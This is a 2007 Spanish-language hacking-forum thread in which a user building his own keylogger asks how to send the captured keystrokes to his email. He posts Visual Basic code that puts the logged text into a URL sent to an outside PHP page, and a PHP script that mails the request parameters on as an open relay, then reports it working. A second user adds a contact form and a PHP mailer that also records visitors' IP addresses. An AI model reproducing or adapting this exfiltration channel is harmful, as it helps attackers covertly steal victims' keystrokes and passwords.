elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Ayuda con php
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con php  (Leído 1,883 veces)
kabruxis

Desconectado Desconectado

Mensajes: 26


Ver Perfil
Ayuda con php
« en: 25 Junio 2007, 22:44 pm »

Estoy haciendo mi keylogger, pero que necesito montar um php que redirecione los e-mails para mi e-mail

el del visual basic eres:

Private Sub Command1_Click()
acorreo = "micorreo@hotmail.com"
asunto = "name"
mensaje = textkey
nombre = "Keylogger"
decorreo = "nombre"
pagina = "la pagina que hospeda mi  php"
pagina = pagina & "acorreo=" & acorreo
pagina = pagina & "&asunto=" & asunto
pagina = pagina & "&mensaje=" & mensaje
pagina = pagina & "&nombre=" & nombre
pagina = pagina & "&decorreo=" & decorreo
WebBrowser1.Navigate pagina
End Sub

E en php eres:

<?php
$datos=$_GET;
$acorreo=$datos['acorreo'];
$asunto=$datos['asunto'];
$mensaje=$datos['mensaje'];
$nombre=$datos['nombre'];
$decorreo=$datos['decorreo'];
mail($acorreo,$asunto,$mensaje,"From: $nombre <$decorreo>");
echo "Correo enviado.";
?>

Pero que no se nada de php, alguna buena persona poderia ayudar-me??


En línea

kabruxis

Desconectado Desconectado

Mensajes: 26


Ver Perfil
Re: Ayuda con php
« Respuesta #1 en: 25 Junio 2007, 22:52 pm »

mandar un correo utilizando un proyecto de Visual Basic y un servidor web con PHP


Esta es mi intencion...


En línea

kabruxis

Desconectado Desconectado

Mensajes: 26


Ver Perfil
Re: Ayuda con php
« Respuesta #2 en: 25 Junio 2007, 22:54 pm »

Exemplo de server de mail... necesito hacer como ese.

http://pio9.com/php/vbcorreo.php?
En línea

kakinets


Desconectado Desconectado

Mensajes: 414


[>Argentina<]


Ver Perfil
Re: Ayuda con php
« Respuesta #3 en: 25 Junio 2007, 23:14 pm »

por q no haces q el mail lo mande desde vb.. es facil de las 2 formas yo lo habia hecho paro un boludo me borro los discos.. yo me fijo y luego te paso el code.. Saludos
En línea

kabruxis

Desconectado Desconectado

Mensajes: 26


Ver Perfil
Re: Ayuda con php
« Respuesta #4 en: 25 Junio 2007, 23:25 pm »

ya tente por winsock, mapi e etc, e no consegui... =/

pero que consigo con el  http://pio9.com/php/vbcorreo.php?

pero necessito hacer mi prprio php para  manejar-lo...

Saludos
En línea

kabruxis

Desconectado Desconectado

Mensajes: 26


Ver Perfil
Re: Ayuda con php
« Respuesta #5 en: 25 Junio 2007, 23:44 pm »

ya consegui,

<?php
$datos=$_GET;
$acorreo=$datos['acorreo'];
$asunto=$datos['asunto'];
$mensaje=$datos['mensaje'];
$nombre=$datos['nombre'];
$decorreo=$datos['decorreo'];
mail($acorreo,$asunto,$mensaje,"From: $nombre <$decorreo>");
echo "Correo enviado.";
?>


saludo a todos
En línea

kakinets


Desconectado Desconectado

Mensajes: 414


[>Argentina<]


Ver Perfil
Re: Ayuda con php
« Respuesta #6 en: 27 Junio 2007, 01:26 am »

Yo lo tengo hecho haci y anda de 10... ajustalo a tu medida por medio de vb y demas... saudos

Código:
<html>

<head>
<meta http-equiv="Content-Language" content="es">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Email</title>
</head>
  <STYLE type=text/css>BODY {
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: white; SCROLLBAR-SHADOW-COLOR: white; SCROLLBAR-ARROW-COLOR: white; SCROLLBAR-TRACK-COLOR: #000000; SCROLLBAR-BASE-COLOR: white; scrollbar-dark-shadow-color: #000000; scrollbar-3d-light-color: black
}
</STYLE>
<body text="#FFFFFF" bgcolor="#000000">

<form method="GET" action="envio.php">
  <p>&nbsp;</p>
  <div align="center">
    <center>
    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="358" height="230" id="AutoNumber1">
      <tr>
        <td width="81" height="21"><b><font size="2" face="Verdana">Nombre:</font></b></td>
        <td width="229" height="15">
        <input type="text" name="T1" size="44" style="color: #FFFFFF; font-family: Tahoma; font-size: 9pt; border: 1px solid #C0C0C0; background-color: #000000"></td>
      </tr>
      <tr>
        <td width="81" height="18"></td>
        <td width="229" height="9"></td>
      </tr>
      <tr>
        <td width="81" height="16"><b><font size="2" face="Verdana">E-mail:</font></b></td>
        <td width="229" height="16">
        <input type="text" name="T2" size="44" style="font-size: 9pt; font-family: Tahoma; color: #FFFFFF; border: 1px solid #C0C0C0; background-color: #000000"></td>
      </tr>
      <tr>
        <td width="81" height="18"></td>
        <td width="229" height="18"></td>
      </tr>
      <tr>
        <td width="81" height="15"><font size="2" face="Verdana"><b>Web</b></font><b><font size="2" face="Verdana">:</font></b></td>
        <td width="229" height="15">
        <input type="text" name="T3" size="44" style="color: #FFFFFF; font-family: Tahoma; font-size: 9pt; border: 1px solid #C0C0C0; background-color: #000000"></td>
      </tr>
      <tr>
        <td width="81" height="17"></td>
        <td width="229" height="18"></td>
      </tr>
      <tr>
        <td width="81" height="28"><b><font size="2" face="Verdana">Comtenido:</font></b></td>
        <td width="229" height="28">&nbsp;</td>
      </tr>
      <tr>
        <td width="81" height="126">&nbsp;</td>
        <td width="229" height="126">
        <textarea rows="9" name="S1" cols="44" style="color: #FFFFFF; font-family: Tahoma; font-size: 9pt; border: 1px solid #C0C0C0; background-color: #000000"></textarea></td>
      </tr>
      <tr>
        <td width="225" height="30" colspan="2">&nbsp;</td>
        </tr>
      <tr>
        <td width="92" height="8">
        <p align="center"></td>
        <td width="266" height="8">
        <p align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
        <input type="submit" value="Enviar" name="B1" style="color: #FFFFFF; border: 1px solid #C0C0C0; background-color: #000000">&nbsp;
        <input type="reset" value="Restablecer" name="B2" style="color: #FFFFFF; border: 1px solid #C0C0C0; background-color: #000000"></td>
        </tr>
    </table>
    </center>
  </div>
</form>

</body>

</html>

Código:
<?php 
$ip=$REMOTE_ADDR;
$nombre = $_POST['T1'];
$email = $_POST['T2'];
$web = $_POST['T3'];
$contenido = $_POST['S1'];
$destino= "tu - mil<br>";
$asunto= "Asunto<br>";
$mensaje= "$Nombre<br>, $email<br>, $web<br>, $contenido<br>, $ip<br>";
mail($destino, $asunto, $mensaje);
   if(!mail($destino, $asunto, $mensaje)){
      echo "No se podido enviar el mensaje";
   }else{
      echo "Se ha enviado el mensaje al Webmaster correctamente!";
   }
?>


<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Envio E-mail</title>
</head>

<body bgcolor="#000000" text="#FFFFFF">

</body>

</html>

       Saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines